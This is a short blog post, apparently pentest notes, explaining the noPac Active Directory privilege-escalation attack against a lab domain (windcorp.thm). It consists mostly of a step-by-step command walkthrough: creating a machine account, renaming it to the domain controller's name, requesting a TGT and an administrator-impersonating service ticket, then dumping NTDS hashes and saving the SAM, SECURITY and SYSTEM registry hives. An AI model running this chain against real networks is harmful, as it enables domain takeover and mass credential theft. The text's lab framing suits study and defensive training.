Post

nopac cve

Posted Updated
Preview Image
By
1 min read
nopac cve

Nopac

1
2
3
4
5
6
7

Obtain credentials for an unprivileged domain-attached user.
Add a computer to their account using Machine Account Quota—let’s name it machine_account$.
Rename the added computer to match the domain controller’s name without the $ (If the domain controller is DC01$, name your computer DC01).
Request a Ticket-Granting Ticket (TGT) for your computer (DC01).
Rename your computer back to machine_account$ or another name.
Using the obtained TGT, request a Service Ticket (ST) to the domain controller while impersonating the administrator (using S4U2Self).
Profit! If successful, you have achieved domain-wide compromise.

Manually Exploit

  1. check if nopac VULNERABLE or not!
    1

    NetExec smb $target -u '' -p '' -M nopac
  2. Check if we create Machine account or not!
    1
2

    # If the Result More than 0, than proceed Exploiation
NetExec ldap $target -u '' -p '' -M maq
  3. Create Machine Account
    1

    addcomputer.py -computer-name 'WIN-UX1ZW42MGEL$' -computer-pass 'ChangeMe#1234' -dc-host FIRE -domain-netbios windcorp.thm 'windcorp.thm/lilyle:ChangeMe#1234'
  4. Writing SPN for Machine Account
    1

    python3 /opt/krbrelayx/addspn.py -u 'windcorp.thm\lilyle' -p 'ChangeMe#1234' -t 'WIN-UX1ZW42MGEL$' -c fire.windcorp.thm
  5. Rename SAMAccountName to DC
    1

    python3 renameMachine.py -current-name 'WIN-UX1ZW42MGEL$' -new-name 'fire' -dc-ip 'fire.windcorp.thm' 'windcorp.thm'/'lilyle':'ChangeMe#1234'
  6. Request a tgt for Machine Account
    1

    getTGT.py -dc-ip 'fire.windcorp.thm' 'windcorp.thm'/'fire':'ChangeMe#1234'
  7. Export and use it
    1

    export KRB5CCNAME=fire.ccache; klist
  8. Rename the System back to Machine Name
    1

    python3 renameMachine.py -current-name 'fire' -new-name 'WIN-UX1ZW42MGEL$' windcorp.thm/lilyle:ChangeMe#1234

Looking at the ticket-granting ticket, we can see the following:

  • Default Principal: This is a TGT for the fire computer/user in the windcorp.thm domain.
  • Service Principal: If this value contains krbtgt, it indicates that this is a valid TGT issued by the KDC.
  1. know Request TGT as Krbtgt
    1

    getST.py -self -impersonate 'administrator' -altservice 'CIFS/fire.windcorp.thm' -k -no-pass -dc-ip 'fire.windcorp.thm' 'windcorp.thm'/'fire'
  2. We successfully ! Got Admin tgt, Know use it
    1

    export KRB5CCNAME=administrator@CIFS_fire.windcorp.thm@WINDCORP.THM.ccache; klist
  3. NTDS Dump
    1
2

    NetExec smb windcorp.thm -k --use-kcache
NetExec smb windcorp.thm -k --use-kcache --ntds

    Dump locally files

    1
2
3

    reg.exe save hklm\sam SAM
reg.exe save hklm\security SECURITY
reg.exe save hklm\system SYSTEM

Resources

AD- Attacks
RDP
This post is licensed under CC BY 4.0 by the author.